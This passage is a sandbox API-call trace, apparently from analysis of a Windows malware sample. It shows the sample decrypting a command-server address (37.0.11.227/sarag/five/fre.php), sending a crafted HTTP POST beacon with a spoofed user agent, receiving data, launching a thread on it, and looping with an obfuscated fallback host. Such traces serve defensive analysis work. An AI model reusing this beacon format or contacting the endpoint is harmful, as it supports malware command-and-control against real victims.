() returned 0x690000 [0248.633] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0248.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.634] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0248.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.640] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0248.649] GetProcessHeap () returned 0x690000 [0248.649] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0248.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.650] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0248.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.651] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0248.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.655] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.655] GetProcessHeap () returned 0x690000 [0248.655] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0248.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.656] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0248.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.658] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0248.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.659] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0248.659] GetProcessHeap () returned 0x690000 [0248.659] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0248.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.660] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0248.661] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.661] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0248.662] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.662] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0248.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.664] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0248.664] GetProcessHeap () returned 0x690000 [0248.664] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0248.664] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0248.666] GetProcessHeap () returned 0x690000 [0248.666] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0248.666] socket (af=2, type=1, protocol=6) returned 0x6e4 [0248.666] connect (s=0x6e4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0248.693] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0248.708] GetProcessHeap () returned 0x690000 [0248.708] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0248.708] GetProcessHeap () returned 0x690000 [0248.708] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0248.709] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0248.709] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0248.709] GetProcessHeap () returned 0x690000 [0248.709] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0248.710] GetProcessHeap () returned 0x690000 [0248.710] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0248.710] GetProcessHeap () returned 0x690000 [0248.710] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0248.710] GetProcessHeap () returned 0x690000 [0248.710] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0248.711] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0248.712] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0248.712] GetProcessHeap () returned 0x690000 [0248.712] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0248.712] GetProcessHeap () returned 0x690000 [0248.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0248.713] send (s=0x6e4, buf=0x6ad508*, len=242, flags=0) returned 242 [0248.713] send (s=0x6e4, buf=0x6aba40*, len=159, flags=0) returned 159 [0248.714] GetProcessHeap () returned 0x690000 [0248.714] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0248.714] recv (in: s=0x6e4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0248.791] GetProcessHeap () returned 0x690000 [0248.792] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0248.792] GetProcessHeap () returned 0x690000 [0248.793] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0248.793] GetProcessHeap () returned 0x690000 [0248.793] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0248.793] GetProcessHeap () returned 0x690000 [0248.794] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0248.794] closesocket (s=0x6e4) returned 0 [0248.794] GetProcessHeap () returned 0x690000 [0248.794] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0248.794] GetProcessHeap () returned 0x690000 [0248.795] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0248.795] GetProcessHeap () returned 0x690000 [0248.795] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0248.795] GetProcessHeap () returned 0x690000 [0248.795] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0248.796] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x143c) returned 0x6e4 [0248.797] Sleep (dwMilliseconds=0xea60) [0248.799] GetProcessHeap () returned 0x690000 [0248.799] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0248.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.800] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0248.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.808] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0248.815] GetProcessHeap () returned 0x690000 [0248.815] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0248.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.816] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0248.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.819] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0248.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.820] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.821] GetProcessHeap () returned 0x690000 [0248.821] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0248.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.822] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0248.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.823] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0248.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.824] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0248.824] GetProcessHeap () returned 0x690000 [0248.825] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0248.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.831] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0248.832] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.832] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0248.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.834] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0248.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.835] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0248.835] GetProcessHeap () returned 0x690000 [0248.835] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0248.835] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0248.835] GetProcessHeap () returned 0x690000 [0248.836] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0248.836] GetProcessHeap () returned 0x690000 [0248.836] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0248.837] GetProcessHeap () returned 0x690000 [0248.837] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0248.837] GetProcessHeap () returned 0x690000 [0248.837] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0248.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.838] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0248.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.852] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0248.876] GetProcessHeap () returned 0x690000 [0248.877] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0248.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.878] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0248.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.879] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0248.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.880] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.880] GetProcessHeap () returned 0x690000 [0248.881] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0248.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.882] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0248.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.883] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0248.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0248.884] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0248.885] GetProcessHeap () returned 0x690000 [0248.885] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0248.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.886] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0248.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.887] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0248.889] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.889] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0248.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.890] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0248.890] GetProcessHeap () returned 0x690000 [0248.890] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0248.890] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0248.890] GetProcessHeap () returned 0x690000 [0248.890] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0248.890] socket (af=2, type=1, protocol=6) returned 0x6e8 [0248.891] connect (s=0x6e8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0248.923] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0248.924] GetProcessHeap () returned 0x690000 [0248.924] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0248.924] GetProcessHeap () returned 0x690000 [0248.924] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0248.924] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0248.925] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0248.925] GetProcessHeap () returned 0x690000 [0248.925] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0248.925] GetProcessHeap () returned 0x690000 [0248.926] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0248.926] GetProcessHeap () returned 0x690000 [0248.926] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0248.926] GetProcessHeap () returned 0x690000 [0248.926] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0248.927] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0248.928] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0248.928] GetProcessHeap () returned 0x690000 [0248.928] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0248.928] GetProcessHeap () returned 0x690000 [0248.928] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0248.928] send (s=0x6e8, buf=0x6ad508*, len=242, flags=0) returned 242 [0248.929] send (s=0x6e8, buf=0x6aba40*, len=159, flags=0) returned 159 [0248.929] GetProcessHeap () returned 0x690000 [0248.929] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0248.929] recv (in: s=0x6e8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0249.002] GetProcessHeap () returned 0x690000 [0249.002] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0249.003] GetProcessHeap () returned 0x690000 [0249.003] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0249.004] GetProcessHeap () returned 0x690000 [0249.004] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0249.004] GetProcessHeap () returned 0x690000 [0249.005] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0249.005] closesocket (s=0x6e8) returned 0 [0249.005] GetProcessHeap () returned 0x690000 [0249.005] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0249.005] GetProcessHeap () returned 0x690000 [0249.006] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0249.006] GetProcessHeap () returned 0x690000 [0249.006] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0249.006] GetProcessHeap () returned 0x690000 [0249.006] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0249.007] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1440) returned 0x6e8 [0249.020] Sleep (dwMilliseconds=0xea60) [0249.023] GetProcessHeap () returned 0x690000 [0249.023] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0249.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.024] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0249.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.033] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0249.041] GetProcessHeap () returned 0x690000 [0249.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0249.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.044] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0249.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.045] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0249.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.047] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.047] GetProcessHeap () returned 0x690000 [0249.047] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0249.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.048] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0249.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.049] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0249.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.051] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0249.051] GetProcessHeap () returned 0x690000 [0249.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0249.052] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.052] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0249.053] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.056] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0249.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.057] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0249.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.058] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0249.058] GetProcessHeap () returned 0x690000 [0249.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0249.058] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0249.058] GetProcessHeap () returned 0x690000 [0249.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0249.059] GetProcessHeap () returned 0x690000 [0249.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0249.059] GetProcessHeap () returned 0x690000 [0249.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0249.059] GetProcessHeap () returned 0x690000 [0249.059] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0249.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.061] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0249.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.066] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0249.072] GetProcessHeap () returned 0x690000 [0249.072] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0249.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.074] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0249.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.077] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0249.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.082] 